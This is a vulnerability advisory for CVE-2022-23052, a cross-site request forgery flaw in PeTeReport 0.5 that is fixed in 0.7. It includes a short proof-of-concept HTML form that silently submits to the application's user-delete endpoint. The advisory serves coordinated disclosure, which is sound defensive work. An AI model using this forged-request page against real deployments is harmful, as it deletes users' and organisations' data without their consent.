---
slug: advisories/jett/
title: PeTeReport 0.5 - Cross-site request forgery
authors: Oscar Uribe
writer: ouribe
codename: jett
product: PeTeReport 0.5
date: 2022-02-09 12:00 COT
cveid: CVE-2022-23052
severity: 4.3
description: PeTeReport 0.5 - Cross-site request forgery
keywords: Fluid Attacks, Security, Vulnerabilities, PeTeReport
banner: advisories-bg
advise: yes
template: advisory
---

## Summary

<summary-table
    name="PeTeReport 0.5 - Cross-site request forgery"
    code="[Jett](https://en.wikipedia.org/wiki/Joan_Jett)"
    product="PeTeReport"
    affected-versions="Version 0.5"
    fixed-versions="Version 0.7"
    state="Public"
    release="2022-02-23">
</summary-table>

## Vulnerability

<vulnerability-table
    kind="Cross-site request forgery"
    rule="[007. Cross-site request forgery](https://help.fluidattacks.com/portal/en/kb/articles/criteria-vulnerabilities-007)"
    remote="Yes"
    vector="CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:X/RL:X/RC:X"
    score="4.3"
    available="No"
    id="[CVE-2022-23052](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23052)">
</vulnerability-table>

## Description

PeteReport **Version 0.5** contains a Cross Site Request Forgery (CSRF)
vulnerability allowing an attacker to trick users into
deleting users, products, reports
and findings on the application.

## Proof of Concept

Steps to reproduce

1. Create a malicious html file with the following content.

    ```html
    <html>
    <body>
    <script>history.pushState('', '', '/')</script>
        <!--Change ID -->
        <form action="https://127.0.0.1/configuration/user/delete/:id">
        <input type="submit" value="Submit request" />
        </form>
    </body>
    </html>
    ```

2. If an authenticated admin visits the malicious url,
   the user with the correspond id will be deleted.

System Information

* Version: PeteReport Version 0.5.
* Operating System: Docker.
* Web Server: nginx.

## Exploit

There is no exploit for the vulnerability but can be manually exploited.

## Mitigation

An updated version of PeteReport is available at the vendor page.

## Credits

The vulnerability was discovered by [Oscar
Uribe](https://co.linkedin.com/in/oscar-uribe-londo%C3%B1o-0b6534155) from the Offensive
Team of Fluid Attacks.

## References

**Vendor page** <https://github.com/1modm/petereport>

**Issue** <https://github.com/1modm/petereport/issues/34>

## Timeline

<time-lapse
  discovered="2022-02-07"
  contacted="2022-02-07"
  replied="2022-02-09"
  confirmed=""
  patched="2022-02-09"
  disclosure="2022-02-23">
</time-lapse>
